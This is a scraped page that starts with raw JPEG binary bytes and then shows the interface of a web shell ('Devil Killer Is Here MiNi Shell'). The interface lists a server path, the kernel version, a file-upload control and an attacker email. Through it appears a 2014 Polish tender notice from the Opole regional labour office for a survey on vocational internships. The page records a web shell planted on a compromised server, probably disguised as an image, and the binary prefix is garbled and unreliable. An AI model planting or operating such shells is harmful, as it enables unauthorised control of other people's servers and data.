JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/201068-N-2014.html

<p class="kh_header"><b>Opole: Realizacja badania społecznego pn. Diagnoza efektywności staży zawodowych</b><br>
<b>Numer ogłoszenia: 201068 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Opolu , ul. Głogowska 25C, 45-315 Opole, woj. opolskie, tel. 0-77 4416701, faks 0-77 4416702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wup.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja badania społecznego pn. Diagnoza efektywności staży zawodowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 1. Utworzenie bazy danych osób, które w 2013 roku ukończyły staż organizowany przez wszystkie powiatowe urzędy pracy w województwie opolskim stanowiącej podstawę do realizacji badania Diagnoza efektywności staży zawodowych. 1) Baza danych powinna zawierać następujące dane: a) Numer identyfikacyjny osoby bezrobotnej, b) Imię i Nazwisko, c) Płeć,
d) Datę urodzenia, e) Dane teleadresowe umożliwiające kontakt z respondentem, f) Datę rozpoczęcia stażu, g) Datę zakończenia stażu, h) Nazwę Powiatowego Urzędu Pracy, i) Poziom wykształcenia osoby, która ukończyła staż. 2) Całkowita liczebność osób figurujących w bazie danych powinna być zgodna z wartością wykazaną w załączniku nr 4 do Sprawozdania MPiPS-01 o rynku pracy w dziale 4.1 (wiersz 1; rubryka 3) dla każdego powiatowego urzędu pracy w województwie opolskim sporządzonego za okres 2013 roku. 2. Porządkowanie i uzupełnianie pozyskanej bazy danych stanowiącej operat do losowania próby badawczej w ramach badania Diagnoza efektywności staży zawodowych zgodnie z zaleceniami Zamawiającego w zakresie: a) istniejących zmiennych, b) tworzenia nowych zmiennych. 3. Wylosowanie próby badawczej do realizacji badania Diagnoza efektywności staży zawodowych. 1) Operat losowania stanowi utworzona przez Wykonawcę baza danych wskazana w punkcie 1 i zaakceptowana przez Zamawiającego. 2) Losowanie należy przeprowadzić odrębnie dla danych z każdego powiatowego urzędu pracy w sposób warstwowy, uwzględniając płeć (pierwsza warstwa), wiek (druga warstwa), wykształcenie (trzecia warstwa). 3) Wielkość próby musi umożliwić uogólnianie wniosków w stosunku do populacji osób, które ukończyły staż w każdym powiatowym urzędzie pracy województwa opolskiego w 2013 roku, przy akceptowalnym błędzie nie większym niż plus/minus 5% 
i przedziale ufności 95% i nie być mniejsza niż: a) 273 osoby dla PUP w Brzegu, b) 187 osób dla PUP w Głubczycach, c) 236 osób dla PUP w Kędzierzynie-Koźlu,
d) 224 osoby dla PUP w Kluczborku, e) 174 osób dla PUP w Krapkowicach,
f) 188 osób dla PUP w Namysłowie, g) 274 osoby dla PUP w Nysie, h) 125 osób dla PUP w Oleśnie, i) 277 osób dla PUP w Opolu, j) 216 osób dla PUP w Prudniku, k) 187 osób dla PUP w Strzelcach Opolskich. 4) Po wylosowaniu próby badawczej, a przed przystąpieniem do zbierania danych Wykonawca zobowiązany jest do przekazania Zamawiającemu bazy danych stanowiących operat losowania oraz wylosowanej próby badawczej z pominięciem danych osobowych w obu wypadkach.
5) Wykonawca może przystąpić do realizacji badania po otrzymaniu akceptacji wylosowanej próby przez Zamawiającego. 4. Zebranie danych od osób wylosowanych do uczestnictwa w badaniu Diagnoza efektywności staży zawodowych. 1) Metody i techniki badawcze. a) Wykonawca w trakcie realizacji zbierania danych posłuży się kwestionariuszem ankiety dostarczonym przez Zamawiającego. b) Przed przystąpieniem do realizacji badania Wykonawca zobowiązany jest do sprawdzenia przekazanego przez Zamawiającego kwestionariusza po kątem logicznym i do wniesienia ewentualnych uwag. Kwestionariusz po korekcie może być wykorzystany do realizacji badania po jego akceptacji przez Zamawiającego. c) Narzędzie, które zostanie przekazane Wykonawcy składać się będzie łącznie z 54 pytań (zmiennych) zamkniętych z kafeterią odpowiedzi jednokrotnego wyboru. d) Odsetek użytecznych kwestionariuszy wypełnionych w trakcie badania nie może być mniejszy niż wskazana liczebność próby badawczej w każdym z powiatowych urzędów pracy.
e) Przez określenie użyteczny kwestionariusz badania rozumieć należy kwestionariusz badania, w którym odsetek braku odpowiedzi na zadane pytania badawcze (zmienne) nie będzie większy niż 5 procent. f) Spośród dostępnych technik dotarcia do respondentów Zamawiający dopuszcza stosowanie jednej lub kilku wybranych technik spośród następujących: wywiad bezpośredni (PAPI), wywiad telefoniczny (CATI), wywiad za pośrednictwem Internetu (CAWI). 2) Respondenci. a) Wykonawca jest zobowiązany do poinformowania respondentów o tym, iż uczestniczą w badaniu realizowanym w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanym prze Unię Europejską w ramach Europejskiego Funduszu Społecznego. b) Zamawiający nie dopuszcza jakiejkolwiek pomocy ze swojej strony w utworzeniu bazy danych, wskazanej w punkcie 1 oraz w dotarciu do respondentów. 3) Bazy danych. Po zakończeniu badania Wykonawca zobowiązany jest do a) przekazania Zamawiającemu zrealizowanej próby badawczej z pominięciem danych osobowych, jednak zwierającej datę przeprowadzenia badania z danym respondentem. b) przekazania każdemu powiatowemu urzędowi pracy w województwie opolskim zrealizowanej i właściwej dla niego próby badawczej zawierającej komplet danych osobowych wraz z datą realizacji badania z danym respondentem, w celu ewentualnej kontroli rzetelności zrealizowanej usługi. 5. Kodowanie danych zebranych wśród osób wylosowanych do uczestnictwa w badaniu Diagnoza efektywności staży zawodowych. 1) Informacje zgromadzone w trakcie procesu zbierania danych Wykonawca zobligowany jest zapisać w formacie obsługiwanym przez program IBM SPSS Statistics 21. (np. .sav; .dbf.; lub .xls); 2) Informacje zebrane w trakcie procesu gromadzenia danych należy zakodować zgodnie z treścią pytań i kafeteriami odpowiedzi zamieszczonymi w narzędziu badawczym przekazanym przez Zamawiającego. 6. Rezultaty powierzonej usługi. Po zrealizowaniu usługi Wykonawca zobowiązany jest do: 1) przekazania Zamawiającemu bazy danych stanowiącej operat losowania oraz wylosowanej próby badawczej z pominięciem danych osobowych w obu wypadkach. Bazy danych należy dostarczyć Zamawiającemu w dwóch kopiach nagranych na płyty CD w formacie obsługiwanym przez program IBM SPSS Statistics 21 (np. .sav; .dbf.; lub .xls) oraz za pośrednictwem poczty elektronicznej. 2) przekazania w dwóch kopiach nagranych na płyty CD zakodowanych informacji pochodzących z realizacji badania w postaci bazy danych z pominięciem danych osobowych, zapisanej w formacie obsługiwanym przez program IBM SPSS Statistics 21 (np. .sav; .dbf.; lub .xls) oraz za pośrednictwem poczty elektronicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej dwie główne usługi badawcze, o wartości brutto nie mniejszej niż 20000,00 złotych każda, wraz z załączeniem dowodów, czy usługi te zostały wykonane należycie. Pod pojęciem głównych usług badawczych należy rozumieć usługi badawcze przeprowadzone metodą ilościową, w których próba badawcza była nie mniejsza niż 1000 osób. Dowodami, o których mowa powyżej są poświadczenia lub oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia. W celu potwierdzenia spełnienia powyższego warunku Wykonawca jest zobowiązany załączyć do swojej oferty wykaz wykonanych głównych usług badawczych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie, sporządzonego według wzoru stanowiącego Załącznik nr 3 do SIWZ. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że będzie dysponować co najmniej 1 (jednym) członkiem wchodzącym w skład zespołu badawczego, który posiada tytuł naukowy doktora nauk społecznych oraz co najmniej 2 (dwoma) członkami posiadającymi tytuł magistra. W celu potwierdzenia spełnienia powyższego warunku Wykonawca jest zobowiązany załączyć do swojej oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzonego według wzoru stanowiącego Załącznik nr 4 do SIWZ. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25 c.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2014 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25 c - KANCELARIA pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opolskie Obserwatorium Rynku Pracy III/Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com